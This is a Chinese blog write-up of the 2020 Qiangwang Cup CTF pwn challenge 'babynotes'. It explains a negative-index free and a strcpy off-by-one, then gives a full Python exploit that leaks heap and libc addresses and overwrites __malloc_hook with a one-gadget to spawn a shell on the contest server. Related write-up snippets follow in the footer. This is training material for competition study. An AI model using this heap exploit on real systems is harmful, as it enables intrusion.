2020强网杯babynotes题wp

最新推荐文章于 2022-08-01 17:28:08 发布
最新推荐文章于 2022-08-01 17:28:08 发布
阅读量543 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sln_1550/article/details/108210443
版权

漏洞点1,删除note时索引可以输入负值:
在这里插入图片描述
配合下面的数据结构,可以free掉buf_motto和buf_name的指针:
在这里插入图片描述
漏洞点2,注册用户时输入name为24个字节时会把age通过strcpy附上,造成offbyone类似的效果:
在这里插入图片描述
思路就是先通过删除-1和-2两个note来泄露heap和libc基址,然后通过fastbin攻击修改malloc_hook,realloc_hook来完成getshell
在这里插入图片描述
具体exp如下:

#coding:utf8
from PwnContext import *
#context.log_level = "debug"
ctx.binary = './babynotes'
ctx.remote = ('123.56.170.202', 43121)
ctx.remote_libc = './libc-2.23.so'
e=ctx.remote_libc
malloc_hook=e.symbols['__malloc_hook']
free_hook=e.symbols['__free_hook']
system=e.symbols['system']
realloc=e.symbols['realloc']
gadget=0xf1207
ctx.breakpoints = [0x400A94]
ctx.debug_remote_libc = True
#ctx.start()
ctx.start('remote')
 
def add(index, size):
    ctx.sendlineafter(">> ","1")
    ctx.sendlineafter("Input index:",str(index))
    ctx.sendlineafter("Input note size:",str(size))
 
def show(index):
    ctx.sendlineafter(">> ","2")
    ctx.sendlineafter("Input index:",str(index))

def delete(index):
    ctx.sendlineafter(">> ","3")
    ctx.sendlineafter("Input index:",str(index))

def edit(index,name):
    ctx.sendlineafter(">> ","4")
    ctx.sendlineafter("Input index:",str(index))
    ctx.sendafter("Input your note:",name)

def register(name,motto,age):
    ctx.sendafter("Input your name:",name)
    ctx.sendlineafter("Input your motto:",motto)
    ctx.sendlineafter("Input your age:",age)

register('test','motto',"100")
add(1,0x18)
add(2,0x88)
add(4,0x8)
add(5,0x8)
delete(1)
delete(-1)
delete(-2)
ctx.sendlineafter(">> ","6")
ctx.recvuntil("Name: ")
heap_addr=u64(ctx.recvuntil("\n")[:-1].ljust(8,'\x00'))
ctx.recvuntil("Motto: ")
main_arena=u64(ctx.recv(6).ljust(8,'\x00'))
log.info("0x%0x,0x%0x"%(heap_addr,main_arena))
libc_base=(main_arena-0x58)-((malloc_hook+0x20)&0xffffffffffe0)#calculate by main_arena
log.info("0x%0x"%libc_base)
topchunk=heap_addr+0x1a8
delete(2)
add(0,0x18)
ctx.debug()
ctx.sendlineafter(">>","5")
register('A'*0x18,"/bin/sh\x00",str(0x101))
delete(0)
add(0,0xf8)
add(1,0x68)
delete(1)
edit(0,p64(0)*25+p64(0x71)+p64(libc_base+malloc_hook-0x20-3))
add(1,0x68)
add(2,0x68)
edit(2,"\x00"*3+p64(0)+p64(libc_base+gadget)+p64(libc_base+realloc+8)) #realloc
delete(1)
add(1,0x10)
ctx.interactive()
sln_1550
关注
专栏目录
强网杯2020线上赛部分wp
qq_36495104的博客
08-30 881
WEB Funhash 参考 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4 exp hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop Web辅助 这是学弟做出来的@Sn0w33 1.php反序列化时,S会把binary string当做字符 2.__wakeup()当属性个数大于实际属性个数时会跳过__wakeup() 3.字符串逃逸 五个字符\
2022强网杯web方向wp
xjh8023的博客
08-01 1500
考点文件泄露,、文件上传、文件包含、反序列化1.扫描目录存在www.zip,存在源码泄露2.代码审计,写一个inc文件内容为上传该文件,修改类型为image/jpeg2.进行反序列化,new一个类3.抓包将反序列化的值赋值给userfile,发包得到fla。...
强网杯2020部分WP
Sea_Sand息禅
08-24 2683
Funhash 有三个level,一个一个过 level1: hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等 给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889 hash1=0e001233333333333334557778889绕过level1 level2 数组绕过:hash2[]=1&hash3[]=3 level3 特殊字符绕过:hash4=ffifdyop
2020强网杯 部分wp
fly夏天的博客
08-26 1680
2020强网杯 部分wp 彩笔参加了这次强网杯,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
强网杯2020-dice2cry&baby_crt&bank
CTF小白的博客
08-29 1659
Web2 dice2cry 操作内容: 输入token后抓包 发现这边给我们设置了一些cookie 一看就知道这是一个RSA加密的密文,公钥n以及公钥e的值 然后抓包roll骰子那个界面 发现他会随机返回给我们一个数字,大概是0-2样子 这边发现abi.php有一个备份文件abi.php.bak 拿到这个abi.php的一个后台源码 <?php session_start(); header("Content-type:text/html;charset=utf-8"); $data = json
2020强网杯部分WP
z4ky的博客
08-25 1466
侧防 IDA打开程序 写脚本逆向即可 str_enc = "Lx|dTUwe\IvNhCBOLqDNfW}ImFZCtiyxO\PW^ebD" str_ = [] for i in range(0,len(str_enc ), 4): str_ .append(str_enc [i+1]) str_ .append(str_enc [i+2]) str_ .append(str_enc [i+3]) str_ .append(str_enc [i]) print
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1600
0x00 前言 本来是在刷 文件上传的,然后没想到强网杯这个打着upload 的幌子其实是个反序列化,看了看wp 后,觉得很有意思,值得记录一下 0x01 解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1199
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
2021第五届强网杯部分writewp
zji
06-14 1194
第五届强网杯部分解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网杯部分解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网先
2020第四届强网杯部分WP
李熠专用博客_白帽子一枚,人称低危终结者
08-24 1326
目序号 主动 操作内容: 进入网址,阅读源码,发现是个命令执行的。 先尝试ls命令列出所有文件,发现存在flag.php文件,猜测flag在该文件中。 然后尝试读取flag.php文件,但是正则匹配了flag关键词,需要使用通配符绕过,如:fla?.php,但是尝试cat、tail、head、more文件读取命令均无效,最后使用tac命令拿到flag。 flag值: flag{I_like_qwb_web} 目序号 Funhash 操作内容: 进入网址,开始阅读源码,发现需要绕过三个不同的限制方
强网杯2020 Blockchain IPFS
lwq787998189的博客
08-24 704
强网杯2020 Blockchain IPFS 首先观察干,下载附件后位如下的文本文档。 两张图片分别为pic1.jpg和pic2.jpg。然后pic2给出了文件的sha256sum,pic1被分为6个碎片进行存储,并给了每个碎片的文件哈希。 了解IPFS的人应该知道,IPFS里面文件哈希均以Qm开头。这是因为IPFS采用了MultiHash技术。原理就是在原有哈希值的前面加上sha-256编码(0x12)和32字节的哈希摘要(0x20),并进行base58编码,最终得到Qm开头的哈希地址。因此在本
2020强网杯强网先锋之Funhash
Firebasky的博客
09-27 1244
作为小白,也应该去见见世面,于是参加了2020强网杯 也让自己学到的了不少。下面是自己关于Funhash的解思路 2020强网杯强网先锋之Funhash 直接上源代码 <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET[.
2020强网杯flowerwp
sln_1550的博客
08-27 532
从apk中解压出libnative.so 拖入IDA,发现加密算法在sub_F34中: 关键部分有花指令,patch后可以直接F5看C源码 整个代码逻辑用python描述如下: 主要操作是对输入的flag字符串前后各用首字节和尾字节填充满128字节,然后加密变化后和固定字符串比较。 根据算法逆写解密程序并执行出结果 ...
2020强网杯部分总结与复现
qwzf
08-31 3401
前言 前几天打了个两天一夜的强网杯比赛,整个人都快要起飞了。比赛后由于CISCN出,没时间总结,现在总结和复现一下部分强网杯 0x01 强网先锋:主动 考点:命令执行+绕过黑名单
[强网杯 2019]随便注&[GYCTF2020]Blacklist -wp
freerats的博客
08-01 737
[GYCTF2020]Blacklist算是随便注的加强版,环境基本一致,不过blacklist禁掉了set和rename,所以随便注的两种常规方法都做不了。 一样的堆叠注入, 1';show databases;# 1';show tables;# 这里使用的新姿势就是handler …open. handler…open语句打开一个表,使其可以使用后续handler … read语句访问,该表对象未被其他会话共享,并且在会话调用handler … close或会话终止之前不会关闭 也就是说可以直.
2020强网杯wp-pwn-babymessage
weixin_45209963的博客
08-27 704
目质量还不错…就是快二十道pwn实在是吓人… 一开始看到堆还没有free以为是horse of orange就溜了 回头一看40多解… 再仔细一看只是栈溢出…傻了 考点也是常规考点,栈迁移 换取足够的写入长度 然后onegadget完事 老样子一个菜单 leave name 可以往bss段的一个地方写4字节 leave message 之前有一个写入长度判断 当然正常情况写入长度只可以是0x10 重点在leave message里面 有一个栈溢出可以覆盖到saved ebp 于是我们可以先在nam
第四届“强网杯”全国网络安全挑战赛_部分WP
Lemon's blog
08-25 3202
前言: 全靠大佬带飞,自己菜的一批,还需继续努力!,记录一下
CTF解-2020强网杯参赛WriteUp
道阻且长,行则将至。
08-29 8879
前言 2020年8月22日9:00 - 8月23日21:00,参加(划水)了历时36小时的第四届“强网杯”全国网络安全竞赛线上赛。 第一次参加CTF比赛,不可思议(成功傍大佬)地从1800+支队伍中以前10%的排名获得“优胜奖”(成功参与奖),故骄傲(厚脸皮)地记录下比赛wp…… 强网先锋 主动 1、进入网址,给出后台php源码,发现是个代码审计的: 2、通过参数拼接命令,发现存在任意命令执行漏洞: 3、进一步查看本路径下的文件: 后台但是过滤了flag关键字,无法直接读取,那么就需要想办法绕过
强网杯 2022 谍影重重wp
最新发布
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个目解答。这道目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值